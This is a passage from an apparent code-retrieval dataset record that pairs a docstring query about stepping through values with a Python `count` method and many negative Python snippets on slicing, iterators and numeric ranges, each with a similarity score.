enumerate(_slice)\n ]\n\n first_edge_cursor = edges[0].cursor if edges else None\n last_edge_cursor = edges[-1].cursor if edges else None\n lower_bound = after_offset + 1 if after else 0\n upper_bound = before_offset if before else list_length\n\n return connection_type(\n edges=edges,\n page_info=pageinfo_type(\n start_cursor=first_edge_cursor,\n end_cursor=last_edge_cursor,\n has_previous_page=isinstance(last, int) and start_offset > lower_bound,\n has_next_page=isinstance(first, int) and end_offset < upper_bound\n )\n )", "def __getslice__(self, i, j):\n return OutputGroup(list.__getslice__(self, i, j))", "def test_simple_slicing(self):\n class only_slice(object):\n def __getitem__(self, index):\n self.res = 'get', index.start, index.stop\n def __setitem__(self, index, value):\n self.res = 'set', index.start, index.stop, value\n def __delitem__(self, index):\n self.res = 'del', index.start, index.stop\n\n class mixed_slice(object):\n def __getitem__(self, index):\n if isinstance(index, slice):\n self.res = 'get', index.start, index.stop\n else:\n raise Exception()\n def __setitem__(self, index, value):\n if isinstance(index, slice):\n self.res = 'set', index.start, index.stop, value\n else:\n raise Exception()\n def __delitem__(self, index):\n if isinstance(index, slice):\n self.res = 'del', index.start, index.stop\n else:\n raise Exception()\n\n for mytype in [only_slice, mixed_slice]:\n x = mytype()\n x[:]\n self.assertEqual(x.res, ('get', None, None))\n\n x[0:]\n self.assertEqual(x.res, ('get', 0, None))\n\n x[1:]\n self.assertEqual(x.res, ('get', 1, None))\n\n x[:100]\n self.assertEqual(x.res, ('get', None, 100))\n\n x[:] = 2\n self.assertEqual(x.res, ('set', None, None, 2))\n\n x[0:] = 2\n self.assertEqual(x.res, ('set', 0, None, 2))\n\n x[1:] = 2\n self.assertEqual(x.res, ('set', 1, None, 2))\n\n x[:100] = 2\n self.assertEqual(x.res, ('set', None, 100, 2))\n\n del x[:]\n self.assertEqual(x.res, ('del', None, None))\n\n del x[0:]\n self.assertEqual(x.res, ('del', 0, None))\n\n del x[1:]\n self.assertEqual(x.res, ('del', 1, None))\n\n del x[:100]\n self.assertEqual(x.res, ('del', None, 100))", "def __init__(self, indices: Tuple[int, ...], slices: Tuple[slice, ...] = (slice(0, 0, 0),)):\n self.indices = indices\n self.slices = slices", "def get_slice_from_list(self,list_,start=0,end=None):\r\n start = self._index_to_int(start,True)\r\n if end is not None:\r\n end= self._index_to_int(end)\r\n\r\n return list_[start:end]", "def iterator(self):\n return _uhd_swig.range_vector_t_iterator(self)", "def _create_slice(cls, op, op_t):\n node = cls._common_singa_tensor_to_onnx_node(op, op_t)\n for attr in ['starts', 'ends', 'axes', 'steps']:\n node.input.append(op.name + \":\" + attr)\n return node", "def __init__(self, dataset=None, components=None, element_spec=None):\n super(OwnedIterator, self).__init__()\n\n if dataset is None:\n if (components is None or element_spec is None):\n raise ValueError(\n \"When `dataset` is not provided, both `components` and \"\n \"`element_spec` must be specified.\")\n # pylint: disable=protected-access\n self._element_spec = element_spec\n self._flat_output_types = structure.get_flat_tensor_types(\n self._element_spec)\n self._flat_output_shapes = structure.get_flat_tensor_shapes(\n self._element_spec)\n self._components = components\n self._iterator_resource, = components\n else:\n if (components is not None or element_spec is not None):\n raise ValueError(\n \"When `dataset` is provided, `element_spec` and `components` must \"\n \"not be specified.\")\n self._create_iterator(dataset)\n\n self._get_next_call_count = 0", "def fromiter(cls, args, **assumptions):\n return cls(*tuple(args), **assumptions)", "def __getslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint3___getslice__(self, *args)", "def __getitem__(self, item: SliceLike):\n\n if item == Ellipsis:\n return JaggedArray(data=self.data[...], shape=self.shape[...])\n elif isinstance(item, slice):\n # slow but works\n return self.__class__.from_aoa(self.to_aoa()[item])\n else:\n return self.data[slice(*self._cumsum[item : item + 2])].reshape(\n self.shape[:, item]\n )", "def __setslice__(self, *args):\n return _itkSurfaceSpatialObjectPointPython.vectoritkSurfaceSpatialObjectPoint3___setslice__(self, *args)", "def _create_slice(arr, id, reference_name, slice_start, slice_end):\n url = f\"http://{request.host}{BASE_PATH}/data?id={id}&reference_name={reference_name}&start={slice_start}&end={slice_end}\"\n arr.append({ 'url': url, })", "def slice_during(self, e):\r\n\r\n if not isinstance(e, Epochs):\r\n raise ValueError('e has to be of Epochs type')\r\n\r\n if e.data.ndim > 0:\r\n raise NotImplementedError('e has to be a scalar Epoch')\r\n\r\n if self.ndim != 1:\r\n e_s = 'slicing only implemented for 1-d TimeArrays'\r\n return NotImplementedError(e_s)\r\n i_start = self.index_at(e.start)\r\n i_stop = self.index_at(e.stop)\r\n if e.start > self[i_start]: # make sure self[i_start] is in epoch e\r\n i_start += 1\r\n if e.stop > self[i_stop]: # make sure to include self[i_stop]\r\n i_stop += 1\r\n\r\n return slice(i_start, i_stop)", "def __delslice__(self, *args):\n return _itkLineSpatialObjectPointPython.vectoritkLineSpatialObjectPoint2___delslice__(self, *args)", "def subseq(self, start_offset=0, end_offset=None):\n from .core import DURATION_64\n\n def subseq_iter(start_offset, end_offset):\n cur_offset = 0\n for point in self._elements:\n try:\n cur_offset += point[DURATION_64]\n except KeyError:\n raise ValueError(\"HSeq.subseq requires all points to have a %s attribute\" % DURATION_64)\n #Skip until start\n if cur_offset < start_offset:\n continue\n\n #Yield points start_offset <= point < end_offset\n if end_offset is None or cur_offset < end_offset:\n yield point\n else:\n raise StopIteration\n return HSeq(subseq_iter(start_offset, end_offset))", "def __iter__(self):\n\n # Open the data reader\n self.data.open()\n\n starts = np.arange(self.start, self.stop, self.chunksize)\n for a, b in zip_longest(starts, starts[1:], fillvalue=self.stop):\n yield self.data.read(a, b, **self.kwargs)", "def __iter__(self):\n self._position = self._size\n return self", "def get_iterator(dataset):\n if context.executing_eagerly():\n iterator = dataset_ops.make_one_shot_iterator(dataset)\n else:\n iterator = dataset_ops.make_initializable_iterator(dataset)\n initialize_iterator(iterator)\n return iterator" ]
[ "0.6592863", "0.6384958", "0.6363769", "0.62649775", "0.61393666", "0.60202515", "0.59986544", "0.5966865", "0.5952172", "0.5857153", "0.5757738", "0.574337", "0.5653791", "0.5642721", "0.56035215", "0.5587913", "0.5578734", "0.5572186", "0.5529783", "0.5510107", "0.5508437", "0.5500182", "0.54971117", "0.5488021", "0.54690593", "0.54680836", "0.5460781", "0.54580855", "0.545602", "0.5444084", "0.54392856", "0.5434571", "0.54335636", "0.5431182", "0.5427369", "0.5421714", "0.54187113", "0.54103214", "0.54044676", "0.53972495", "0.5394975", "0.53918725", "0.5391205", "0.53895587", "0.53895587", "0.5370065", "0.53601116", "0.53559184", "0.53449523", "0.5343511", "0.5341193", "0.53361577", "0.5321521", "0.53208834", "0.5309536", "0.5309161", "0.53077215", "0.53025067", "0.52885133", "0.5285885", "0.527488", "0.5272961", "0.5268177", "0.5267699", "0.52676374", "0.52622277", "0.52618545", "0.5257003", "0.52567315", "0.525449", "0.5249287", "0.52466315", "0.5243029", "0.52387756", "0.52232033", "0.52175426", "0.5217536", "0.5215885", "0.5209616", "0.5207532", "0.5204153", "0.5202871", "0.51999414", "0.5186721", "0.51861167", "0.51723355", "0.51696455", "0.5148806", "0.5144437", "0.51386786", "0.51379585", "0.5135898", "0.51355886", "0.51272285", "0.51235443", "0.5122112", "0.5112418", "0.5107037", "0.510199", "0.50961214" ]
0.6573793
1
Return values starting from start advancing by the given step.
def count(self, start=0, step=1, stop=None): out = itertools.count(start, step) if stop is not None: out = itertools.takewhile(lambda x: x < stop, out) return Iter(out)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def drange(start, stop, step):\n values=[]\n r = start\n while r <= stop:\n values.append(r)\n r += step\n return values", "def make_step(self):\n self.step_vals = np.cumsum(self.vals)", "def arange(self, start: float, stop: float, step: float = 1.0) -> None:\n self.values = []\n assert step != 0.0\n while abs(start) < abs(stop):\n self.values.append(start)\n start += step", "def values(self, start: XValue[T], stop: XValue[T], step: XValueDiff[T]) -> \"SortedDict[XValue[T], float]\":\n\n step = step or (stop - start)\n if len(self.breakpoints) == 0:\n num_values = int(math.ceil((stop - start) / step))\n return SortedDict([(start + step * i, self._initial_value) for i in range(num_values)])\n\n curr_xval = start\n curr_value = self.call(start)\n next_index, next_breakpoint, next_value = self._breakpoint_info(self.breakpoints.bisect(start))\n\n sequence = SortedDict()\n while curr_xval < stop:\n sequence[curr_xval] = curr_value\n\n next_xval = min(stop, curr_xval + step)\n while next_breakpoint and next_xval >= next_breakpoint:\n assert next_index is not None # if next_breakpoint is set, next_index should also be set\n curr_value = next_value\n next_index, next_breakpoint, next_value = self._breakpoint_info(next_index + 1)\n curr_xval = next_xval\n\n return sequence", "def train(self, steps):\r\n for e in range(steps):\r\n # do something...\r\n pass\r\n return self.get_value_function()", "def value(self, step):\n raise NotImplementedError", "def sample(self, start, end, step):\n # get frames and values\n frames = floatRange(start, end, step)\n values = self.getValues(frames)\n\n # get points and angles\n angles = []\n points = [Vector2D(*coord) for coord in zip(frames, values)]\n\n for i in range(1, len(points) - 2):\n v1 = points[i - 1] - points[i]\n v2 = points[i + 1] - points[i]\n angles.append(math.degrees(math.pi - v1.angle(v2)))\n\n return [points, angles]", "def step(self):\n rtn = self.loc\n for i in range(0,self.space):\n rtn = self._step(rtn)\n\n self.steps += 1\n self.loc = np.copy(rtn) # necessary?\n\n if self.record_steps:\n self.history = np.concatenate((self.history, [rtn]), axis=0)\n\n assert(self.history.shape == (self.steps, self.dim))\n\n return rtn", "def _incremental_steps(start, end, steps, stepsize=None):\n if stepsize is None: step_size = (end - start) / np.maximum((steps - 1), 1)\n gradient = []\n for i in range(steps):\n value = start + step_size * i\n gradient.append(value)\n\n return gradient[0:steps]", "def step_values(self):\n return self._get_values().copy()", "def _setVals(self, step=0):\n self.step = step", "def value_steps(self, steps):\n return self.initial_value * self.schedule(steps / self.nvalues)", "def step(self, dt):\n return Vector(self.P.x + dt*self.V.x, self.P.y + dt*self.V.y)", "def slice(self, start=0, stop=None, step=1):\n if not isinstance(start, int):\n for item in self.data:\n if start in item:\n start = self.data.index(item)\n if not isinstance(start, int):\n raise ValueError('The start value you entered does not exist in this ALE.')\n if stop is None: stop = len(self.data)\n if not isinstance(stop, int):\n for item in self.data:\n if stop in item:\n stop = self.data.index(item)\n if not isinstance(stop, int):\n raise ValueError('The stop value you entered does not exist in this ALE.')\n if stop < start and step > 1:\n raise ValueError('You have selected a stop value that is earlier than your start value and your step value is positive.')\n result = islice(self.data, start, stop, step)\n return result", "def step(self):\n value = self.current_event[\"step\"][\"value\"]\n self.current_value.append(value)", "def drange(start, stop, step):\n elem = start\n while elem <= stop:\n yield elem\n elem += step", "def step(self):\n return _uhd_swig.range_t_step(self)", "def mrange(start, end, steps=1):\n list = []\n i = start\n while i < end:\n list.append(i)\n i += steps\n return list", "def step(v, direction, step_size):\n return [v_i + step_size * direction_i\n for v_i, direction_i in zip(v, direction)]", "def range(start, stop, step=1.):\n start, stop, step = map(float, (start, stop, step))\n\n result = [start]\n current = start\n while current < stop:\n current += step\n result.append(current)\n return result", "def smoothed(sequence, step=1, start=0):\n next_index = start + 1\n last = len(sequence) \n new_sequence = []\n if not step:\n return sequence\n ratio_step = step + 1\n for item in sequence:\n new_sequence.append(item)\n if next_index < last:\n next_item = sequence[next_index]\n ratio = (item + next_item) / (step + 1)\n ratio = int(ratio)\n for x in range(step):\n value = (ratio * x) + item\n new_sequence.append(int(value))\n next_index = next_index + 1\n return new_sequence", "def step(v, direction, step_size):\n return [v_i + step_size * direction_i\n for v_i, direction_i in zip(v, direction)]", "def xSteps(self,start,ziel,steps=10):\n erg=[]\n wert=(ziel-start)/(steps)\n for i in range(1, steps+1):\n erg.append(round(start+wert*i,2))\n return erg", "def step(self):\n return _uhd_swig.meta_range_t_step(self)", "def step (result: list, line: str):\n return result + points (result [-1], line)", "def xfrange(start, stop=None, step=1):\n\tif stop is None:\n\t\tstop = start\n\t\tstart = 0.0\n\tstart = float(start)\n\twhile start < stop:\n\t\tyield start\n\t\tstart += step", "def step(self, frame):\n result = []\n frame = self.process_frame(frame)\n ycords, xcords = frame.nonzero()\n for i in xrange(len(ycords)):\n result.append((ycords[i], xcords[i], frame[ycords[i], xcords[i]]))\n self.result_values.append(result)\n return result", "def sample(self, step=None):\n step = self.step if step is None else step\n ndim = len(self.lower_bounds)\n pts = numpy.zeros(ndim)\n for j in range(ndim):\n step_size = (self.upper_bounds[j] - self.lower_bounds[j]) / (self.nsteps)\n pts[j] = step * step_size + self.lower_bounds[j] + 0.5 * step_size\n return pts", "def compute_step(self, step):\n #print(self.velocity)\n self.position += step * self.velocity\n #print(self.position)", "def step_points(self) -> np.array:\n if self._data is None:\n return np.array([])\n return self._data.index.values", "def get_items(self, start, stop, next_position=None):", "def get_steps(self):\n return self.steps", "def getSteps():", "def interval(start, stop=None, step=1):\n if stop is None:\n start, stop = 0, start\n result = []\n i = start\n while i < stop:\n result.append(i)\n i += step\n return result", "def next_step(self):\n\n y_next = []\n y_next.append(0)\n for i in range(1, len(self.x) - 1):\n x = self.x[i]\n\n y = self.constant* (self.y_current[i + 1] + self.y_current[i - 1] - 2 * self.y_current[i])\\\n + 2 * self.y_current[i] - self.y_previous[i]\n\n y_next.append(y)\n\n y_next.append(0)\n\n self.y_previous = copy.copy(self.y_current)\n self.y_current = copy.copy(y_next)\n\n if self.timestep % 10000 is 0:\n self.timeframes[self.timestep] = copy.copy(self.y_current)\n\n self.timestep += 1", "def fill_step(self):\n while len(self.x_values) < self.num_points\n x_step = self.get_step()\n y_step = self.get_step()\n if x_step == 0 and y_step == 0:\n continue\n next_x = self.x_values[-1] x x_step\n next_y = self.y_values[-1] + y_step\n self.x_values.append(next_x)\n self.y_values.append(next_y)", "def xfrange(start, stop=None, step=None):\n if stop is None:\n stop = float(start)\n start = 0.0\n if step is None:\n step = 1.0\n cur = float(start)\n while cur < stop:\n yield cur\n cur += step", "def step(self, step=None):\n pass", "def step(self):\n return self._step", "def getRange (start, stop, step=1):\r\n result = [n for n in range(start, stop, step)]\r\n return result", "def move(self, step):\n for point in self.points:\n l = min(len(step), len(point.position))\n for i in range(l):\n point.position[i] = step[i]", "def move_next(self, step=1):\n if self._index is not None and len(self) > self._index + step:\n self._index += step\n # if index >= end index of current frame --> recalculate findex\n if self._index >= self._findex * self._flen + self._flen:\n self._findex += int(math.ceil(step / float(self._flen)))\n return self[self._index]\n return None", "def float_range(start, stop, step=1): \n while start < stop:\n yield start\n start += step", "def run(self, step:int=0):\n if step > 0:\n _range = range(self.current_step, self.current_step + step + 1)\n else: # run forever\n _range = itertools.count(self.current_step)\n for step_num in _range:\n self.step()", "def _enumerate_step_points(starting, ending, win_size, step_size):\n try:\n starting = max(int(starting), 0)\n ending = max(int(ending), 0)\n win_size = max(int(win_size), 1)\n step_size = max(int(step_size), 1)\n except (TypeError, ValueError):\n tf.logging.fatal(\n 'step points should be specified by integers, received:'\n '%s, %s, %s, %s', starting, ending, win_size, step_size)\n raise ValueError\n if starting > ending:\n starting, ending = ending, starting\n sampling_point_set = []\n while (starting + win_size) <= ending:\n sampling_point_set.append(starting)\n starting = starting + step_size\n additional_last_point = ending - win_size\n sampling_point_set.append(max(additional_last_point, 0))\n sampling_point_set = np.unique(sampling_point_set).flatten()\n if len(sampling_point_set) == 2:\n # in case of too few samples, adding\n # an additional sampling point to\n # the middle between starting and ending\n sampling_point_set = np.append(\n sampling_point_set, np.round(np.mean(sampling_point_set)))\n _, uniq_idx = np.unique(sampling_point_set, return_index=True)\n return sampling_point_set[np.sort(uniq_idx)]", "def collect(self, start=None, stop=None, step=None):\n counts_compressed = self.counts_compressed()\n if start is None:\n if len(counts_compressed) > 0:\n start = self.values[counts_compressed[0][0]]\n else:\n start = -1.0\n if stop is None:\n if len(counts_compressed) > 1:\n stop = self.values[counts_compressed[-1][0]]\n else:\n stop = 1.0\n if step is None:\n step = (stop - start) / 10.0\n\n counts = self.get_counts(start, stop + step, step)\n current = start\n bins = []\n next_one = current + step\n i = 0\n while next_one <= stop + (step) and i < len(counts):\n start_bin = self.get_bin_index(current)\n stop_bin = self.get_bin_index(next_one)\n bin = {\n \"value_start\": current,\n \"value_stop\": next_one,\n \"bin_index_start\": start_bin,\n \"bin_index_stop\": stop_bin,\n \"count\": counts[i],\n }\n bins.append(bin)\n current = next_one\n next_one = current + step\n i += 1\n return bins", "def step ( self ) :\n return self.__step", "def arange(start=0, stop=None, step=None):\n raise NotImplementedError", "def arange(start: float, stop: float, step: float = 1.0) -> list[float]:\n start = decimal.Decimal(str(start))\n stop = decimal.Decimal(str(stop))\n step = decimal.Decimal(str(step))\n if step <= 0:\n raise ValueError('Step must be >= 0')\n out = []\n current = start\n while current < stop:\n out.append(float(current))\n current += step\n return out", "def _get_next_point(self):\n #Get the index of the current step in each dimension\n nparams = len(self.transform.get_params())\n indices = [0]*nparams\n #Get the number of steps in each dimension\n lengths = [len(self.steps[i]) for i in range(nparams)]\n\n end = False\n while not end:\n yield [self.steps[i][indices[i]] for i in range(nparams)]\n\n #Increment the index of the last paramenter and then check whether it goes over the end\n indices[-1] += 1\n for p in reversed(range(nparams)):\n if indices[p] == lengths[p]:\n indices[p] = 0\n if p > 0:\n indices[p-1] += 1\n else:\n end = True", "def get_next_steps(self, steps):\n for step in range(steps):\n # Actual calulation: Runge-Kutta 2\n\n # Step 1\n k1 = [\n self.vel * self.dt,\n self.get_next_acc() * self.dt\n ]\n\n # Step 2\n next_pos = self.pos + k1[0] * 0.5\n next_vel = self.vel + k1[1] * 0.5\n self.disps, self.dists = self.get_relative_distances(positions=next_pos)\n k2 = [\n next_vel * self.dt,\n self.get_next_acc(save=False) * self.dt\n ]\n\n # Step 3\n next_pos = self.pos + k2[0] * 0.5\n next_vel = self.vel + k2[1] * 0.5\n self.disps, self.dists = self.get_relative_distances(positions=next_pos)\n k3 = [\n next_vel * self.dt,\n self.get_next_acc(save=False) * self.dt\n ]\n\n # Step 4\n next_pos = self.pos + k3[0]\n next_vel = self.vel + k3[1]\n self.disps, self.dists = self.get_relative_distances(positions=next_pos)\n k4 = [\n next_vel * self.dt,\n self.get_next_acc(save=False) * self.dt\n ]\n\n # Move forward\n self.pos = self.pos + 1/6 * (k1[0] + 2*k2[0] + 2*k3[0] + k4[0])\n self.vel = self.vel + 1/6 * (k1[1] + 2*k2[1] + 2*k3[1] + k4[1])\n\n # Saving of statistics\n self.save_system_information(self.pos, self.vel)", "def step(self, dt):\n \n # get the current stage of the integration\n k_num = self.cstep\n\n for array in self.arrays:\n\n np = array.get_number_of_particles()\n\n # get the mapping for this array and this stage\n to_step = self.step_props[ array.name ][k_num]\n\n for prop in to_step:\n\n initial_prop = to_step[ prop ][0]\n step_prop = to_step[ prop ][1]\n\n initial_arr = array.get( initial_prop )\n step_arr = array.get( step_prop )\n\n updated_array = initial_arr + step_arr * dt\n\n # simply use periodicity for the positions\n if prop in ['x', 'y', 'z']:\n updated_array[numpy.where(updated_array < 0)[0]] += 1\n updated_array[numpy.where(updated_array > 1)[0]] -= 1\n\n array.set( **{prop:updated_array} )\n\n # Increment the step by 1\n self.cstep += 1", "def irange(start, stop, step=1):\n assert float(step) != 0.0, \"Null step in irange.\"\n value = start\n if step > 0:\n while value < stop:\n yield value\n value += step\n else: # step < 0\n while value > stop:\n yield value\n value += step", "def compute_step(self, step):\r\n self.position += step * self.velocity\r\n self.solpos.append(np.copy(self.position)) \r\n self.solvel.append(np.copy(self.velocity)) \r\n self.solvel_mag.append(np.linalg.norm(np.copy(self.velocity)))", "def regular(step, start=0.):\n\n def output(low, high):\n newstart = math.ceil((low - start)/step) * step + start\n return numpy.arange(newstart, high, step, dtype=numpy.float)\n output.func_name = \"regular(%g, start=%g)\" % (step, start)\n return output", "def double_range(start, stop, step):\n r = start\n while r < stop:\n yield r\n r += step", "def do_steps(self):\n steps = self.get_step_conf()\n all_step_config = dict()\n for k, v in steps.items():\n tmp_list = list()\n all_step_config[k] = tmp_list\n start = v[\"Start Value\"]\n end = v[\"End Value\"]\n # special handling of edge length\n if(k == \"Edge Length\"):\n start = self.convert_to_tuple(start)\n end = self.convert_to_tuple(end)\n tmp_list.append(str(start))\n while(start != end):\n start = self.add_edge_length(\n start, self.convert_to_tuple(v[\"Step\"]))\n tmp_list.append(str(start))\n print start\n else:\n tmp_list.append(float(start))\n while float(start) < float(end):\n start = float(start) + float(v[\"Step\"])\n tmp_list.append(start)\n return all_step_config", "def frange(start, stop, step):\n i = start\n while i < stop:\n yield i\n i += step", "def _step(self) -> None:", "def generate_list(start: int, stop: int, step: int = 1) -> List[int]:\n # if start == stop:\n # print(start)\n # else:\n # res = []\n # while start < (stop + 1):\n # res.append(start)\n # start += step\n # print(res)\n\n return [item for item in range(start, (stop+step))]", "def _get_steps(self):\n return self.steps", "def x_next( self , x , u , t = 0 , dt = 0.1 , steps = 1 ):\n \n x_next = np.zeros(self.n) # k+1 State vector\n \n # Multiple integration steps\n for i in range(steps):\n \n x_next = self.f(x,u,t) * dt + x\n \n # Multiple steps\n x = x_next\n \n return x_next", "def horde_step(self, observation):", "def step(self, d=1):\n raise NotImplementedError()", "def getLinIterSteps( self, var, index = 0 ):\n\n values = self.getLinIterData( var, index )\n return values[0]", "def step_constant(step):\n return step", "def frange(start, stop, step=1.0):\n i = start\n while i <= stop:\n yield i\n i += step", "def step(self, action):\n # Implement your step method here\n # return (observation, reward, done, info)\n self._state = self._state + action\n # print('Step state:', self._state)\n x, y = self._state\n reward = - (x ** 2 + y ** 2) ** 0.5\n done = abs(x) < 0.01 and abs(y) < 0.01\n next_observation = np.copy(self._state)\n return Step(observation=next_observation, reward=reward, done=done)", "def create_step_samples(self):\n pass # Deferred to subclasses\n\n \"\"\" Example using pod height:\n start_value = self.sim.pod.last_height\n end_value = self.sim.pod.height\n\n # Lerp values to get samples\n samples = start_value + self.step_lerp_pcts * (end_value - start_value) # Or use self.lerp(start_value, end_value), but doing it directly is faster since no function call\n if self.noise_scale > 0:\n # Add gaussian noise if specified\n return samples + np.random.normal(0.0, noise_scale, len(samples))\n else:\n # No noise\n return samples \n \"\"\"", "def get_step(self):\n direction = choice([1, -1])\n distance = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step", "def get_step(self):\n direction = choice([1, -1])\n distance = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step", "def __call__(self, new_val, previous_val, step):\n\t\treturn", "def get_step(self):\n direction = choice([1,-1])\n direction = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step", "def get_step(self):\n # decide which direction and how far\n direction = choice([1, -1])\n distance = choice([0, 1, 2, 3, 4])\n step = direction * distance\n return step", "def step(self):\n raise NotImplementedError", "def start(self, step=None):\n\n if step is None:\n while True:\n next_event = self._pop_next_event()\n if next_event:\n self.current_time = next_event.datetime\n next_event.call()\n else:\n break\n else:\n # TODO: this is not right...\n while True:\n run_to = self.current_time + step\n while True:\n next_event = self._pop_next_event(run_to)\n if next_event:\n next_event.call()\n else:\n break\n print \"{time} Simulation Finished\".format(time=self.current_time)", "def next_step(self, location, prev_step):\n vox_data = self._interpolator[location]\n\n sampling_points = self._model.sampling_points\n sampling_edges = self._model.sampling_edges\n samples = self._model.evaluate(vox_data)\n\n peak_values, peak_inds = peak_finding_onedge(samples, sampling_edges)\n peak_points = sampling_points[peak_inds]\n peak_points = _robust_peaks(peak_points, peak_values,\n self.min_relative_peak, self.peak_spacing)\n step = _closest_peak(peak_points, prev_step, self.dot_limit)\n return step", "def step_changes(self) -> pd.Series:\n return self._get_deltas().copy()", "def __iter__(self):\n self.__getitem__(self._num_steps - 1)\n return iter(self._previous_values[self.last_index:])", "def __call__(self, start):\r\n return self._iterate(start)", "def step(self):\r\n raise NotImplementedError", "def group_consecutives(vals, step=1):\r\n\trun = []\r\n\tresult = [run]\r\n\texpect = None\r\n\tfor v in vals:\r\n\t\tif (v == expect) or (expect is None):\r\n\t\t\trun.append(v)\r\n\t\telse:\r\n\t\t\trun = [v]\r\n\t\t\tresult.append(run)\r\n\t\texpect = v + step\r\n\treturn result", "def step(self, move):", "def linrange(start, stop=None, step=1):\n if stop is None:\n stop = start\n start = 0\n n = int(round((stop-start) / step))\n return linspace(start, stop, n+1)", "def extend(self, step):\n self.timesteps.extend(step.timesteps)\n self.masks.extend(step.masks)\n self.x.extend(step.x)\n self.y.extend(step.y)\n self.i.extend(step.i)\n self.j.extend(step.j)\n self.end_time = step.end_time\n self.times = np.arange(self.start_time, self.end_time + self.step, self.step)\n self.u = np.concatenate((self.u, step.u))\n self.v = np.concatenate((self.v, step.v))\n for attr in self.attributes.keys():\n if attr in step.attributes.keys():\n self.attributes[attr].extend(step.attributes[attr])", "def step(self, steps):\n self._simulate(endStep=self.currentStep+steps)", "def vbForRange(start, stop, step=1):\n num_repeats = (stop - start) / step\n if num_repeats < 0:\n return\n current = start\n while num_repeats >= 0:\n yield current\n current += step\n num_repeats -= 1", "def _stepped_value(self, val):\n if isinstance(self.valstep, Number):\n val = (self.valmin\n + round((val - self.valmin) / self.valstep) * self.valstep)\n elif self.valstep is not None:\n valstep = np.asanyarray(self.valstep)\n if valstep.ndim != 1:\n raise ValueError(\n f\"valstep must have 1 dimension but has {valstep.ndim}\"\n )\n val = valstep[np.argmin(np.abs(valstep - val))]\n return val", "def slicer(seq, start=None, stop=None, step=None):\n return seq[start:stop:step]", "def getIntersectionsFromStep(self, step=1, valve=1e-3):\n sections = []\n extents = self.IntersectionScale # 截取区间\n levels = np.arange(*extents, step=step) # 每隔 1m 截一次\n for i in range(len(levels)):\n origin_temp = self.centroid.copy()\n origin_temp[0] = origin_temp[0] + levels[i]\n try:\n slice = self.mesh.section(plane_origin=origin_temp, plane_normal=self.nVec)\n # 选取每个截面图中面积最大的子图,实现初步去噪\n if slice is not None:\n slice_2D, to_3D = slice.to_planar()\n slices_splited = slice_2D.split()\n sliceIndex = np.argmax([s.area for s in slices_splited])\n slice_2D = slices_splited[sliceIndex]\n if slice_2D.area > valve:\n sections.append(slice_2D.to_3D(to_3D))\n except:\n pass\n \n self.Intersections = sections", "def step(node,path):\n return (node[0]+path[0],node[1]+path[1])", "def steps(self):\n for step in self._get_paged(\"steps\", trailing=True):\n yield self.__get_object(step)\n\n return", "def step(self, state):\n a = super().step(state)\n return np.clip(a, -1, 1)", "def step(self, state):\n a = super().step(state)\n return np.clip(a, -1, 1)", "def frange(self,start,stop,step):\n\n frange_res = []\n \n current_num = start\n while current_num <= stop:\n frange_res.append(current_num)\n current_num = current_num + step\n\n if frange_res[len(frange_res) - 1] < stop:\n frange_res.append(stop)\n\n return frange_res", "def compute_step(X):\n return MOVING_STEP", "def step(self, dt_usec):\n\n # If we have no listeners, don't waste time calculating samples\n # @todo: Maybe calculate self.next_step so that we can add sensors during sim, but only if it turns out to be necessary\n if len(self.step_listeners) == 0:\n return\n \n # If the start of our next sample is greater than 1 (step), skip creating samples for this step\n if self.next_start >= 1.0:\n self.next_start -= 1\n return\n \n samples_per_step = self.sampling_rate * dt_usec / 1000000.\n sample_pct_of_step = 1.0/samples_per_step + 0.00000001 # For lerping -- add a tiny amount to eliminate floating point errors (doesn't affect the sim at this scale)\n\n self.step_lerp_pcts = np.arange(self.next_start, 1.0, sample_pct_of_step)\n\n # Call get_step_samples() (implemented in subclasses) to get the samples and add them to the buffer\n samples = self.create_step_samples(dt_usec) # Format np.array([<sample time>, <sample data 1>, ...])\n\n # Send our data to any attached listeners\n #self.logger.debug(\"Sending samples to {} step listeners\".format(len(self.step_listeners)))\n for step_listener in self.step_listeners:\n step_listener.step_callback(self, samples)\n\n # Update or start pct for the next step\n # @TODO: If we don't add .0000001 (or any tiny number, really) here the number of samples taken will be off by quite a bit at smaller step sizes. Probably floating point error....\n #self.next_start = sample_pct_of_step - (1 - self.step_lerp_pcts[-1]) +.0000001 # Works, but moved this to sample_pct_of_step calculation\n self.next_start = sample_pct_of_step - (1 - self.step_lerp_pcts[-1])", "def get_steps(self):\n return self.steps", "def make_slice_inclusive(start, stop=None, step=None):\n if stop is None:\n return start, stop, step\n\n if step is None or step > 0:\n if stop == -1:\n stop = None\n else:\n stop += 1\n else:\n if stop == 0:\n stop = None\n else:\n stop -= 1\n return start, stop, step", "def group_consecutives(vals, step=0.0001):\n run = []\n result = [run]\n expect = 0.\n for v in vals:\n v = round(v,5)\n expect = round(expect,5)\n if (v == expect) or (expect == 0.):\n run.append(v)\n else:\n run = [v]\n result.append(run)\n expect = v + step\n return result", "def interpolate(self, step=1, kind=1):\n vt = Reference.interpolate(self, step)\n if vt is False:\n return False\n # Value sequence\n # starting from the oldest time minus step\n oldi = self.get_time(vt[0] - step)\n # Check if we have enough points to interpolate\n if len(self) - oldi < 5:\n return False\n # If possible, go back one more point, for interpolation safety\n if oldi > 1:\n oldi -= 1\n # Decode values and separate time and value vectors\n dat = self[oldi:]\n# print 'Getting data',self.path,dat,vt\n dat = np.array(dat)\n dat = dat.transpose()\n # Build a linear spline using vt points as knots\n #f=LSQUnivariateSpline(dat[0],dat[1],vt, k=kind)\n # Do a linear fitting\n (slope, const), res, rank, sing, rcond = np.polyfit(\n dat[0], dat[1], kind, full=True)\n # Build a vectorized evaluator\n f = np.vectorize(lambda x: slope * x + const)\n while vt[0] < dat[0][0] and len(vt) > 1:\n vt = vt[1:]\n while vt[-1] > dat[0][-1] and len(vt) > 1:\n vt = vt[:-1]\n if len(vt) <= 1:\n return False\n try:\n # Interpret time series\n out = f(vt)\n except:\n print 'Array.interpolate', self.path, vt, dat\n raise\n # Encode in (t,v) append-able list\n out = np.array([vt, out]).transpose()\n self.summary.commit(out)\n return True" ]
